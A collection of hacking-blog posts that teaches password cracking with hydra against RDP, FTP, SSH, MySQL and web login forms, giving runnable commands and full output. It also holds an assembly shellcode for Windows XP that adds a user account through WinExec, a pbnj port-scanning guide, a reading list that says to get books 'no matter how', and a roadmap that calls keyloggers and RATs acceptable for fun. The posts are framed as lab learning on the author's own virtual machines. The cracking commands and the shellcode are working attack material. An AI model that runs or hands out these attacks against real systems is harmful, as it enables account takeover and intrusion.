Brute force attack & dictionary password cracking using hydra

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Brute force attack and Dictionary password cracking attack is still effective. Brute force attack can be more effective if the hacker has good knowledge in password profiling,information gathering. Today, i will shortly explain that how a hacker can crack password using hydra brute force attack or dictionary attack. Before that let me give you a short definition of Brute force and dictionary attack.

Brute force attack

Brute force attack is combination of all character a-z,A-Z,1-3 and other special characters.

Dictionary password attack

Dictionary attack is a list of common password. For example, you know “admin” is used as password to protect various confidential resource. So you put the “admin” word in your dictionary file. You also can download free password list from various source(Google search!). If the hacker is lucky then password will be in the list.

I will explain how a hacker can make brute force attack using hydra to crack various online accounts.

Brute Force Attack

If hackers decide to make pure brute force then they need to exclude the option ‘-P’ and use ‘-x min:max:char’, for example ‘-x 3:3:a’ :

root@find:~/Desktop# hydra -t 10 -V -f -l root -x 4:6:a ftp://192.168.67.132

The hydra syntax:
-t = How many parallel attempt at a time(1/5/10/100 ?). Don’t use too much otherwise you will get false result
-V = Show output
-f = Stop when found the password.
-l = The Username (-L for username from file)
-P= Dictionary file
IP-address-or-domain module-such-as-http-form

Cracking the RDP password

We know the default username of windows is “administrator” So we can brute force the password only:

root@find:~/Desktop# hydra -t 1 -V -f -l administrator -P common.txt rdp://192.168.67.132
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 13:24:21
[DATA] 1 task, 1 server, 933 login tries (l:1/p:933), ~933 tries per task
[DATA] attacking service rdp on port 3389
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Admin" - 1 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Administration" - 2 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "crm" - 3 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CVS" - 4 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CYBERDOCS" - 5 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CYBERDOCS25" - 6 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "CYBERDOCS31" - 7 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "INSTALL_admin" - 8 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Log" - 9 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Logs" - 10 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "Pages" - 11 of 933 [child 0]
[ATTEMPT] target 192.168.67.132 - login "administrator" - pass "youradmin" - 12 of 933 [child 0]
[3389][rdp] host: 192.168.67.132 login: administrator password: youradmin
[STATUS] attack finished for 192.168.67.132 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 13:24:46

I did it on vmware workstation and was too slow!

Cracking FTP password

Hacker knows the user name of the FTP is 'root' , So hacker make a quick password guessing with following command:

root@find:~/Desktop# hydra -t 5 -V -f -l root -P common.txt ftp://192.168.67.132
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 13:45:55
[DATA] 5 tasks, 1 server, 934 login tries (l:1/p:934), ~186 tries per task
[DATA] attacking service ftp on port 21
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Admin" - 1 of 934 [child 0]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Administration" - 2 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "crm" - 3 of 934 [child 2]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CVS" - 4 of 934 [child 3]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CYBERDOCS" - 5 of 934 [child 4]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CYBERDOCS25" - 6 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "CYBERDOCS31" - 7 of 934 [child 0]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "INSTALL_admin" - 8 of 934 [child 2]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Log" - 9 of 934 [child 3]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Logs" - 10 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Pages" - 11 of 934 [child 4]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "youradmin" - 12 of 934 [child 0]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "ftpadmin" - 13 of 934 [child 2]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Servlet" - 14 of 934 [child 3]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Servlets" - 15 of 934 [child 1]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "SiteServer" - 16 of 934 [child 4]
[ATTEMPT] target 192.168.67.132 - login "root" - pass "Sources" - 17 of 934 [child 0]
[21][ftp] host: 192.168.67.132 login: root password: ftpadmin
[STATUS] attack finished for 192.168.67.132 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 13:45:55
root@find:~/Desktop#

Here the password is ftpadmin!

root@find:~/Desktop# ftp 192.168.67.132
Connected to 192.168.67.132.
220 Hello, I'm freeFTPd 1.0
Name (192.168.67.132:root): root
331 Password required for root
Password:
230 User root logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection
drwxr-xr-x 1 root root 0 Jan 7 13:39 .
drwxr-xr-x 1 root root 0 Jan 7 13:39 ..
226 Directory send OK

Cracking SSH password with hydra

root@find:~/Desktop# hydra -t 5 -V -f -l root -P common.txt localhost ssh
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 14:11:56
[DATA] 5 tasks, 1 server, 935 login tries (l:1/p:935), ~187 tries per task
[DATA] attacking service ssh on port 22
[ATTEMPT] target localhost - login "root" - pass "Admin" - 1 of 935 [child 0]
[ATTEMPT] target localhost - login "root" - pass "Administration" - 2 of 935 [child 1]
[ATTEMPT] target localhost - login "root" - pass "crm" - 3 of 935 [child 2]
[ATTEMPT] target localhost - login "root" - pass "CVS" - 4 of 935 [child 3]
[ATTEMPT] target localhost - login "root" - pass "CYBERDOCS" - 5 of 935 [child 4]
[ATTEMPT] target localhost - login "root" - pass "CYBERDOCS25" - 6 of 935 [child 1]
[ATTEMPT] target localhost - login "root" - pass "CYBERDOCS31" - 7 of 935 [child 3]
[ATTEMPT] target localhost - login "root" - pass "INSTALL_admin" - 8 of 935 [child 4]
[ATTEMPT] target localhost - login "root" - pass "Log" - 9 of 935 [child 2]
[ATTEMPT] target localhost - login "root" - pass "sshfuck" - 10 of 935 [child 0]
[22][ssh] host: 127.0.0.1 login: root password: sshfuck
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 14:11:58

MySQL password cracking using hydra

In this case we are going to crack a empty password of mysql. Some Peoples still does not use password to protect their database server. We can make brute force attack like this:

root@find:~/Desktop# hydra -t 5 -V -f -l root -e ns -P common.txt localhost mysql
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-07 14:18:16
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] 4 tasks, 1 server, 937 login tries (l:1/p:937), ~234 tries per task
[DATA] attacking service mysql on port 3306
[ATTEMPT] target localhost - login "root" - pass "root" - 1 of 937 [child 0]
[ATTEMPT] target localhost - login "root" - pass "" - 2 of 937 [child 1]
[ATTEMPT] target localhost - login "root" - pass "Admin" - 3 of 937 [child 2]
[ATTEMPT] target localhost - login "root" - pass "Administration" - 4 of 937 [child 3]
[3306][mysql] host: 127.0.0.1 login: root password:
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-07 14:18:16

Attention to the option of hydra: -e ns .

Web Form brute forcing

I have coded a simple html login form for this test. Hydra can brute force web form faster and effectively than other tools. But it requires you to understand that how the form is being handled. So the hacker need to have basic understanding of html too. Also the hacker/you need to find out the correct username otherwise it will be failed or will need to brute force the  user name which is really bad idea.

The login form:

<html>
<head>
<title>Admin Login</title>
</head>

<body>
<center>
<h1>Administrator Login</h1>
<form action="log.php" method="post" >
Username:<input type="text" name="user" placeholder="admin"> <br>
Password:<input type="password" name="password" placeholder="password"><br>
<input type="submit" name="user" value="submit" >
</form>
</center>

</body>
</html>

We actually need to brute force the name=”password” . “password” is the name of the password field which need to match with an string from database or from php hard coded string. For your better understanding i am pasting the log.php too:

<?php

$pass="yourpass";

$passGet=$_POST["password"];

if($passGet==$pass){
echo "success!";
echo "<br>";
}

else{
echo "fail";
}


?>

In the php code $passGet=$_POST[“password”]; getting field string by post method and comparing with variable $pass . If you input yourpass in password field then it will say success otherwise fail.

Imagine, We don’t know the password so we are going to brute force it using hydra. We have following information:

URL: http://http://localhost/login/ (Optional?)
Action page: http://localhost/login/log.php   (Required)
User: admin
Form parameter:  user=admin&password=brute-force-here   (see the html!)

Let us now brute force the password using thc-hydra.

Hydra command 1:

hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"

Here is output:

root@find:~/Desktop# hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:S=success"
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-09 06:08:07
[DATA] 4 tasks, 1 server, 935 login tries (l:1/p:935), ~233 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Admin" - 1 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Administration" - 2 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "crm" - 3 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CVS" - 4 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS" - 5 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS25" - 6 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS31" - 7 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "INSTALL_admin" - 8 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Log" - 9 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "yourpass" - 10 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Logs" - 11 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Pages" - 12 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "youradmin" - 13 of 935 [child 1]
[80][www-form] host: 192.168.206.1 login: admin password: yourpass
1 of 1 target successfully completed, 1 valid password found
Let's break down the "/login/log.php:user=^USER^&password=^PASS^:S=success
 
/login/ = path
log.php = Action page 
user = First parameter
^USER^ = Use the strings from -l or -L
password = Second parameter
^PASS^ =  Use the strings from -p or -P(usually dictionary file or for brute force option -x)
S=success = When hydra see success message from the action page it will stop mean , Successfully cracked!
This is really important. If it has been set wrong then hydra will give false positive. So careful! 
 

Hydra command 2:

hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"

Output:

root@find:~/Desktop# hydra -t 4 -l admin -V -P common.txt 192.168.206.1 http-form-post "/login/log.php:user=^USER^&password=^PASS^:fail"
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-09 06:38:28
[DATA] 4 tasks, 1 server, 935 login tries (l:1/p:935), ~233 tries per task
[DATA] attacking service http-post-form on port 80
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Admin" - 1 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Administration" - 2 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "crm" - 3 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CVS" - 4 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS" - 5 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS25" - 6 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "CYBERDOCS31" - 7 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "INSTALL_admin" - 8 of 935 [child 2]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Log" - 9 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "yourpass" - 10 of 935 [child 0]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Logs" - 11 of 935 [child 3]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "Pages" - 12 of 935 [child 1]
[ATTEMPT] target 192.168.206.1 - login "admin" - pass "youradmin" - 13 of 935 [child 2]
[80][www-form] host: 192.168.206.1 login: admin password: yourpass
1 of 1 target successfully completed, 1 valid password found

In this command brute forced the page with fail string. When input bad password , the page generate “fail” message. So we tell the thc-hydra that keep attacking whenever you see the message “fail” . So hydra won’t stop until it see other strings instead “fail”.  But we need to be careful that if in the success page has “fail” string in somewhere then hydra will give you false results.  Depend on the situation ! For example a success page might have following welcome message:

Welcome User! We are not responsible if you are fail to protect your confidential information. Be careful from hacker!

In this case hydra will give false result. So think , how you want to set fail string!

Some tips against brute force:
1. Use strong password.
2. Login page should have captcha.
3. Server should be counting the fail attempt and block the ip after few fail attempt of login.

Hope you enjoyed!

Useful books to get into hacking!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

A good book can take you so far. Having some good book really a good idea to learn something new and improving our knowledge. I have posted some useful book’s amazon link (no matter how you get them). These book will really help you much to go into hacking.  After reading these book you will have a very good understanding of system and hacking and you will be able find out the information what you are looking for. There are thousands of free papers but you don’t know what to search and what to learn. After reading these book you will have goal though.

1. C Primer Plus 5th Edition: To get into hacking and penetration we need to understand programming Language. Most of the powerful language is C. This book is very good to learn the C programming language whereas “The C programming language” is bit harder for newbie. Get this book and start reading.

2.  Core Python Application Programming: For automatic and quick task we must need to code in an scripting language(Such as for exploit development). For this, the python is really very powerful(my favorite language). Learn Python from this book. For basic of python get the book “Learn python the hard way” or go to www.python.org tutorial section.

3. Assembly Language Step-by-Step: Assembly language is very very important for understanding how system work and for exploit development. This book will teach you the basic assembly language using nasm which is enough to understand asm registers,instruction and basic coding(such as shellcoding). After read this book you should read intel manuals.

4. Advanced Linux Programming: Don’t avoid the Linux internal. We are required to know Linux Internal And system programming is best to go with. This book is good and freely download-able.

5. Get two books on Windows: Windows® Internals, Part 1: Covering Windows Server® 2008 R2 and Windows 7
and
 Windows Internals, Part 2: Covering Windows Server® 2008 R2 and Windows 7

and read them when you have free time. It is very useful knowing windows internals.

6. Basic of penetration testing 2nd edition: I have read the first edition and it was good for newbie who is coming into hacking. Get Basic idea of penetration testing and hacking from this book.

7. Web application hacker handbook 2nd edition: This is a gold book to learn web hacking. If you are newbie and read this book carefully then you will have a very good understanding of hacking web. I believe you don’t need any other book to learn web hacking. After reading this book you just need to start your real research on web hacking. Another book is owasp “web application penetration testing guide” which a good start too.

8. The shellcoder’s handbook second edition: This book is very good to learn system hacking. It is bit outdated but still very useful. It discussed about common software vulnerability like buffer overflow, format string, shellcoding etc. Get this book!!!

9. Hack using python:  I did not read this book fully but the book is very good if you want to know that how to hack using python programming language. Yes , You should read this book(Get somehow!).

 

10. Corelan: Corelan have more than 11 tutorials which is worth than other commercial exploit development course and books. Read them if you want to move to exploit development and shellcoding. 

11. Metasploit cookbook

Getting started in pentesting!!!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

You also want to get started with pentesting & hacking? There are thousands of guys want to get started with pentesting and hacking but they don’t have any clue that where they should start. So i  quickly wrote this articles so that you can get started very easily without any confusion.

NOTE: Hacking is a long way since it is a research. You need to change your mind completely and be 100% serious that you will start studying to be a hacker or a pentester. If you want to hack for temporary fun, inspire your friend then being a script kiddie is okay(Keylogger and RAT). This is not possible to learn hacking in few months , it may take 3-10 years to be a good one. So you take one option of 1.Become Script Kiddie , 2. Become professional pentester or hacker, security researcher. Up to you!!!  

Basic

1. Basic of Networking: Understanding of networking really important since everything we need to do over network. So you should have a good understanding of tcp/ip and OSI models.

2. Programming: Programming is very important for being a hacker or pentester. Because we must know how a program and system really works. Also Without programming skills it is hard to find a vulnerability. Most important languages you should learn are:

                Python.
                C/C++
                Assembly
                PHP

Intermediate
1. Become A System Administrator: Yes, you need to be a system administrator of Linux and Windows both. If you can’t be a good system administrator then it is not possible to be a good pentester.
2. Writing codes: Write basic code. You don’t need to be software developer. But programming is the best weapon to solve your problem. For example, You want to complete a task automatically(such as deleting a file), Checking hundreds of file permission etc. So write codes!!! Maybe 10-50 lines of codes can do very powerful work for you.
3. Read some online articles, resource:
4. Try to go deeper of the Operating System: Yes, Understand the internal of OS(Windows,linux). If you want to be hacker then you need to know the Operating System very well.

Intermediate+
1. Virtualization :  Get vmware workstation or virtual box . Install various operating system such windows xp,7, redhat,debian etc. Install some additional software and run your port scanner, vulnerability scanner etc. 

2. Old Application and known vulnerability: go to exploit-db.com and get some vulnerable application. Install them on your vm and re-create the exploit. Use your debugger and knowledge. You should install various software including Web or system software. You may get owasp “broken web application”.

3.   Pentesting distro: Install Kali(Backtrack) Linux and use the tools against your vm. 

4. Hack: Hack yourself and hack the vm before going to real world.

Advance
You will understand when you are need of advance knowledge and what is meaning of “advance”.

There are lots of  things you need to become a successful hacker. Everything can take 1,2 or 3 even more years. You need to be patience and serious about hacking. It is not possible to hack or we can’t learn to hack within few days. Just keep going until success and the success will be waiting for you :). Various Books on pentesting is really really very helpful. I will write another new post with review of some books to learn hacking more quickly. 

Content spoofing attack (Brother of Reflected XSS)!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Content spoofing is altering data/text of web pages. XSS uses <script> or any other JS  (E.G: <script>alert(1)</script> whereas  Content spoofing not. It can be using text or html code. A hacker can deface the page virtually. But not able to own the server/web.

Since there are two good explanation of this vulnerability so you better read there:

https://www.owasp.org/index.php/Content_Spoofing
http://projects.webappsec.org/w/page/13246917/Content%20Spoofing

Something like this:
https://www.owasp.org/index.php/Pusheax.com_is_a_independent_penetration_tester,_ethical_hacker_who_always_love_to_learn_new_things_and_share_knowledge.Knowledge_should_be_free_but_not_the_hard_work._There_is_nothing_perfect.

http://projects.webappsec.org/w/page/13246917/%28pusheax%20is%20a%20regular%20independent%20pentester%20,%20I%20love%20to%20learn%20new%20things,and??

It is not such a powerful to hack entire server or an website but sometime these kind of vulnerability is enough to make the users fool.

My first shellcode was in two registers, The adduser shellcode!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

I always tried to learn to write simple shellcode in assembly language. But writing the shellcode was not my first interest , my interest was Exploit writing. I had to learn to understand assembly language for various reason such as Understanding how computer works, Effectively use of Debugger, Exploit writing,fun etc. So i searched on Google a lots “Writing shellcode” , Fortunately I found some amazing tutorials(Reference!). I will explain each line of my first shellcode below. Before that i want to tell that what tools i used to write this shellcode:

1. Nasm: www.nasm.us

2. arwin: http://www.vividmachines.com/shellcode/arwin.c

3. xxd-shellcode: http://www.projectshellcode.com/downloads/xxd-shellcode.sh

4. shellcode-test: http://www.vividmachines.com/shellcode/shellcodetest.c

The shellcode:

;add user shellcode. Only will work on windows xp3. Written by pusheax.com 
[BITS 32]

global _start

section .text

_start:
jmp short command


function: ;Label
;WinExec("Command to execute",NULL)
pop ecx
xor eax,eax
push eax
push ecx
mov eax,0x7c8623ad
call eax

xor eax,eax
push eax
mov eax,0x7c81cafa
call eax



command: ;Label
call function
db "cmd.exe /c net user pusheax popebp /ADD"
db 0x00


So let me explain each line

[BITS 32] : Tell the nasm the code is for 32bit.

global _start : Declare main starting label .

section .text : Declare the code section.

jmp short command: jmp instruction used for jumping to another label call “command” . “Call” instruction is not possible because “call” will save then next instruction to stack to get back to next instruction. This is really a common trick when writing shellcode. So it is telling to jump to “command” label and keep no return address in stack.

So now we are in label “command” and it holds following instructions:-

call function : Calling “function” label and saving the next address(whatever) in stack for return purpose . The Next instruction is simple system command:

 db “cmd.exe /c net user pusheax popebp /ADD”

So whatever , we are in label “function” 
There is a simple windows API  we need call is WinExec(), http://msdn.microsoft.com/en-us/library/windows/desktop/ms687393%28v=vs.85%29.aspx  . It only requires two parameter.

pop     ecx : Take the current return address into ecx and remove the address from stack.

xor     eax,eax : cleaning the eax register to 0. We can directly push 0 to stack but clearly it will issue null bytes. So most shellcoder does xor.

push     eax : pushing 0 to stack. Since Stack is LIFO so it will be the last parameters.

push     ecx : Do you remember that we have popped an address into ecx ? ecx actually holding “cmd.exe /c net user pusheax popebp /ADD” . So we need to push this string to stack for WinExec() first parameter. Currently stack holds: WinExec(“cmd.exe /c net user pusheax popebp /ADD”,NULL).

mov     eax,0x7c8623ad :   0x7c8623ad is address of WInExec(). Moving this address into eax . I found this address using arwin.exe ( ./arwin.exe Kernel32.dll WinExec ).

call      eax : eax=WinExec(). So it is executing the API function.

xor    eax,eax: clean eax register. Because we are going to terminate the current process soon. We are going to call ExitProcess() function to exit the current process. otherwise shellcode may get corrupted. You may see it on Debugger. 

 push   eax: Same as above we are pushing the last parameters to stack.

mov     eax,0x7c81cafa : Same as above i used arwin to find the address of ExitProcess() function.

call      eax: eax=ExitProcess’s address. Calling eax will execute the function.

Test

1. nasm -f bin -o shellcode.bin
2. ./xxd-shellcode.sh shellcode.bin
3. paste into the shellcode-test.c:
4. compile with mingw and execute then check the new user name :).

 Reference:

https://www.corelan.be/index.php/2010/02/25/exploit-writing-tutorial-part-9-introduction-to-win32-shellcoding/

http://projectshellcode.com/node/20

Port scanning using pbnj!

The site moved to root domain where all post are imported. Please go to http://pusheax.com/

Recently i installed Kali Linux on Vmware workstation. There was a tool called pbnj which can scan port and store results in mysql database. Sometime it is useful storing vulnerable assessment into database.But in Kali linux it is not installed as default. pbnj use nmap(with “-a [options] to scan network , I only use it store the result in database!

Let’s  see how to install and use it to scan port and store to database

root@find:~# apt-cache search pbnj
pbnj - a suite of tools to monitor changes on a network
root@find:~# apt-get install pbnj

Start mysql services on Kali Linux:

root@find:~# /etc/init.d/mysql start
[ ok ] Starting MySQL database server: mysqld ..
[info] Checking for tables which need an upgrade, are corrupt or were
not closed cleanly..


Let’s find all file related of pbnj :

root@find:~# updatedb;locate pbnj
/usr/bin/outputpbnj
/usr/bin/scanpbnj
/usr/share/doc/pbnj
/usr/share/doc/pbnj/BUGS
/usr/share/doc/pbnj/EXAMPLES
/usr/share/doc/pbnj/NOTES-ON-NMAP-VERSION
/usr/share/doc/pbnj/README.gz
/usr/share/doc/pbnj/changelog.Debian.gz
/usr/share/doc/pbnj/changelog.gz
/usr/share/doc/pbnj/copyright
/usr/share/doc/pbnj/examples
/usr/share/doc/pbnj/examples/csv.yaml
/usr/share/doc/pbnj/examples/mysql.yaml
/usr/share/doc/pbnj/examples/pg.yaml
/usr/share/doc/pbnj/examples/sqlite3.yaml
/usr/share/man/man1/outputpbnj.1p.gz
/usr/share/man/man1/scanpbnj.1p.gz
/var/cache/apt/archives/pbnj_2.04-4_all.deb
/var/lib/dpkg/info/pbnj.list
/var/lib/dpkg/info/pbnj.md5sums



I am going to use mysql so i am only interested in “/usr/share/doc/pbnj/examples/mysql.yaml” . So we need to edit this file to use correct username, password and database :
root@find:~# cp /usr/share/doc/pbnj/examples/mysql.yaml ~/.pbnj-2.0/config.yaml;
nano ~/.pbnj-2.0/nano config.yaml
# YAML:1.0
# Config for connecting to a DBI database
# SQLite, mysql etc
db: mysql
# for SQLite the name of the file. For mysql the name of the database
database: pbnjdb
# Username for the database. For SQLite no username is needed.
user: root
# Password for the database. For SQLite no password is needed.
passwd:""
# Password for the database. For SQLite no host is needed.
host: localhost
# Port for the database. For SQLite no port is needed.
port: 3306

In Kali mysql password is blank and username “root”. You should really change the username and password. But i am doing it without changing anything. Set let’s configure mysql:
root@find:~# mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or g.
Your MySQL connection id is 44
Server version: 5.5.28-1 (Debian)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.

mysql> create database pbnjdb;
Query OK, 1 row affected (0.00 sec)

mysql>

We are ready to go now:

root@find:~# scanpbnj
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/scanpbnj, line 26.
Usage: scanpbnj [Options] {target specification}

Target Specification:
Can pass hostnames, IP addresses, networks, etc.
Ex: microsoft.com, 192.168.0.1, 192.168.1.1/24, 10.0.0.1-254
-i --iplist <iplist> Scan using a list of IPs from a file
-x --xml <xml-file> Parse scan/info from Nmap XML file

Scan Options:
-a --args <args> Execute Nmap with args (needs quotes)
-e --extraargs <args> Add args to the default args (needs quotes)
--inter <interface> Perform Nmap Scan using non default interface
-m --moreports <ports> Add ports to scan ex: 8080 or 3306,5900
-n --nmap <path> Path to Nmap executable
-p --pingscan Ping Target then scan the host(s) that are alive
--udp Add UDP to the scan arguments
--rpc Add RPC to the scan arguments
-r --range <ports> Ports for scan [def 1-1025]

--diffbanner Parse changes of the banner

Config Options:
-d --dbconfig <config> Config for results database [def config.yaml]
--configdir <dir> Directory for the database config file

--data <file> SQLite Database override [def data.dbl]
--dir <dir> Directory for SQLite or CSV file [def . ]

General Options:
--nocolors Don't Print Colors
--test <level> Testing information
--debug <level> Debug information
-v --version Display version
-h --help Display this information

Send Comments to Joshua D. Abraham ( jabra@ccs.neu.edu )

Now Let’s scan port:

root@find:~# scanpbnj -a "-sS"  localhost
Shell will be removed from the Perl core distribution in the next major release. Please install the separate libshell-perl package. It is being used at /usr/bin/scanpbnj, line 26.

--------------------------------------
Starting Scan of 127.0.0.1
Inserting Machine
Inserting Service on 3306:tcp mysql
Inserting Service on 5432:tcp postgresql
Scan Complete for 127.0.0.1
--------------------------------------


Above the command option “-a” for nmap argument is “-sS”. Scan finished and hopefully result written to database. Let’s check:

root@find:~# mysql -uroot -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or g.
Your MySQL connection id is 52
Server version: 5.5.28-1 (Debian)

Copyright (c) 2000, 2012, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.

mysql> use pbnjdb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables
-> ;
+------------------+
| Tables_in_pbnjdb |
+------------------+
| machines |
| services |
+------------------+
2 rows in set (0.00 sec)

mysql> select * from services;
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
| mid | service | state | port | protocol | version | banner | machine_updated | updated_on |
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
| 12 | mysql | up | 3306 | tcp | unknown version | unknown product | 1364339543 | Tue Mar 26 19:12:23 2013 |
| 12 | postgresql | up | 5432 | tcp | unknown version | unknown product | 1364339543 | Tue Mar 26 19:12:23 2013 |
+------+------------+-------+------+----------+-----------------+-----------------+-----------------+--------------------------+
2 rows in set (0.00 sec)

mysql>

mysql> select * from machines;
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
| mid | ip | host | localh | os | machine_created | created_on |
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
| 1 | 192.168.2.92 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 2 | 192.168.2.96 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 3 | 192.168.2.91 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 4 | 192.168.2.98 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 5 | 192.168.2.99 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 6 | 192.168.2.100 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 7 | 192.168.2.97 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 8 | 192.168.2.94 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 9 | 192.168.2.93 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 10 | 192.168.2.90 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 11 | 192.168.2.95 | 0 | 0 | unknown os | 1364339153 | Tue Mar 26 19:05:53 2013 |
| 12 | 127.0.0.1 | localhost | 1 | unknown os | 1364339543 | Tue Mar 26 19:12:23 2013 |
+-----+---------------+-----------+--------+------------+-----------------+--------------------------+
12 rows in set (0.00 sec)

mysql>

There is another tool installed called outputpbnj which can be used to dump the result without manually logging to MySQL.

root@find:~# locate outputpbnj
/usr/bin/outputpbnj
